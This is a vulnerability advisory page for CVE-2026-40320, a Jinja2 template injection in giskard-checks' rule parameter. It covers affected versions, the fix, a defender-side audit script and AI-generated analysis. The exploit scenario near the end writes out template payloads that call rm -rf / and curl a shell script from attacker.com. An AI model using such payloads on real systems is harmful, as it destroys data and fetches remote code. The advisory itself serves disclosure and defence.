
SSTI: CVE-2026-40320

Severity: MEDIUM (CVSS 4.0 base score 5.4)
Improper Neutralization of Special Elements Used in a Template Engine (CWE-1336)
Published 2026-04-14 · https://github.com/Giskard-AI/giskard-oss · GHSA-7xjm-g8f4-rp26

CVSS Vector (NVD)

CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector: Local
Attack Complexity: Low
Privileges Required: Low
User Interaction: Passive (P)
Scope: X (not defined)

Lifecycle Timeline (5 events)

CVSS changed: Apr 17, 2026 - 18:22 (NVD), 5.4 (MEDIUM)
Patch released: Apr 15, 2026 - 02:30 (nvd), patch available
Analysis generated: Apr 15, 2026 - 01:13 (vuln.today)
Analysis generated: Apr 14, 2026 - 23:31 (vuln.today)
CVE published: Apr 14, 2026 - 23:13 (nvd), MEDIUM 5.4

Description (NVD)

Summary

The ConformityCheck class in giskard-checks rendered the rule parameter through Jinja2's default Template() constructor. Because the rule string is silently interpreted as a Jinja2 template, a developer may not realize that template expressions embedded in rule definitions are evaluated at runtime. In a scenario where check definitions are loaded from an untrusted source (e.g. a shared project file or externally contributed configuration), this could lead to arbitrary code execution.

giskard-checks is a local developer testing library with no network-facing service. Check definitions, including the rule parameter, are provided in application code or project configuration files and executed locally. Exploitation requires write access to a check definition and subsequent execution of the test suite by a developer.

However, the implicit template evaluation of the rule parameter is not obvious from the API surface. This hidden behavior increases the likelihood of a developer inadvertently passing untrusted input to it when integrating the library into a larger system.

Affected Component

conformity.py, line 59:

```python
from jinja2 import Template
...
formatted_rule = Template(self.rule).render(trace=trace)
```
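Two defender-side helpers, added here as an example and not taken from giskard-checks or from the advisory: an audit that flags check definitions whose rule contains Jinja2 syntax (exactly what the vulnerable line above would hand to Template().render()), and a hypothetical substitution-only formatter showing how a trace value can be placed into a rule without any expression being evaluated. The sample check definitions are constructed.

```python
import re
from dataclasses import dataclass, field
from string import Template as SubstitutionOnlyTemplate

# Delimiters that jinja2.Template(rule).render(...) would evaluate as code.
_JINJA_RE = re.compile(r"\{\{.*?\}\}|\{%.*?%\}|\{#.*?#\}", re.DOTALL)
_KIND = {"{{": "expression", "{%": "statement", "{#": "comment"}

@dataclass
class Finding:
    check_name: str
    constructs: list = field(default_factory=list)  # (kind, snippet) pairs

def find_template_constructs(rule: str) -> list:
    """Return every Jinja2 construct in a rule string as (kind, snippet)."""
    return [(_KIND[m.group(0)[:2]], m.group(0)) for m in _JINJA_RE.finditer(rule)]

def audit_check_definitions(definitions: list) -> list:
    """Flag definitions whose 'rule' holds template syntax.

    On giskard-checks < 1.0.2b1 such a rule is executed by Jinja2 when the
    suite runs, so review it as code from whoever last edited the definition.
    """
    findings = []
    for definition in definitions:
        constructs = find_template_constructs(str(definition.get("rule", "")))
        if constructs:
            findings.append(Finding(definition.get("name", "<unnamed>"), constructs))
    return findings

def format_rule_without_evaluation(rule: str, trace: dict) -> str:
    """Substitute $name placeholders only; nothing in the rule is evaluated.

    Hypothetical helper: string.Template is substitution-only, so Jinja2
    syntax passes through untouched. (The 1.0.2b1 fix removed templating.)
    """
    return SubstitutionOnlyTemplate(rule).safe_substitute(trace)

# Constructed sample check definitions, as a project config file might hold.
SAMPLE_DEFINITIONS = [
    {"name": "polite_tone", "rule": "The answer must be polite."},
    {"name": "echo_trace", "rule": "The answer must mention {{ trace.output }}."},
    {"name": "looped", "rule": "{% for m in trace.messages %}{{ m }}{% endfor %} is short."},
]

if __name__ == "__main__":
    for finding in audit_check_definitions(SAMPLE_DEFINITIONS):
        print(finding.check_name, [kind for kind, _ in finding.constructs])
```

Running the audit in CI over every check definition that arrives through a pull request gives reviewers a list of rules that an unpatched installation would execute rather than compare.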

Affected Versions

giskard-checks < 1.0.2b1

Patched Version

giskard-checks >= 1.0.2b1 (template parsing removed from rule evaluation entirely)

Remediation

Upgrade to giskard-checks >= 1.0.2b1. The template rendering has been removed from rule evaluation.

Credit

Giskard-AI thanks @dhabaleshwar for identifying the unsandboxed template usage.

Analysis (AI-generated)

Remote code execution in giskard-checks through server-side template injection (SSTI) in the ConformityCheck class allows arbitrary Python code execution when the rule parameter is processed via unsandboxed Jinja2 template rendering. Affected versions prior to 1.0.2b1 silently interpret rule strings as Jinja2 templates, enabling attackers with write access to check definitions or configuration files to inject malicious template expressions that execute during test suite execution. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Recon: Attacker writes malicious rule definition to shared config file
Delivery: Developer integrates and runs test suite locally
Exploit: ConformityCheck class loads rule parameter
Install: Jinja2 Template() interprets rule as template code
C2: Template expression injects __import__('os').system() call
Execute: Arbitrary code executes with developer privileges
Impact: Attacker achieves code execution and data exfiltration

Vulnerability Assessment (AI-generated)

Risk Assessment: Although CVSS and EPSS scores are not available in the provided data, the real-world risk is elevated due to several factors: (1) confirmed vulnerability in a development/testing library where code execution is the natural impact; (2) CWE-1336 is a well-understood template injection class with reliable exploitation techniques; (3) the attack vector is local but realistic: shared project files, pull requests with configuration changes, or integration of third-party check definitions are common collaboration patterns in development workflows; (4) no authentication bypass is required; (5) SSVC framing suggests moderate exploitability (requires local write access and developer action) but high technical impact (code execution). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.

Exploit Scenario: A developer collaborating on a shared giskard-checks project receives a pull request that updates a rule definition in a check configuration file. The attacker embeds a Jinja2 template expression such as {{ __import__('os').system('rm -rf /') }} or {{ __import__('subprocess').check_output(['curl', 'attacker.com/shell.sh']) }} within the rule parameter. …

Remediation: Upgrade giskard-checks to version 1.0.2b1 or later immediately. … Detailed patch versions, workarounds, and compensating controls in full report.



CVE-2026-40320 vulnerability details – vuln.today
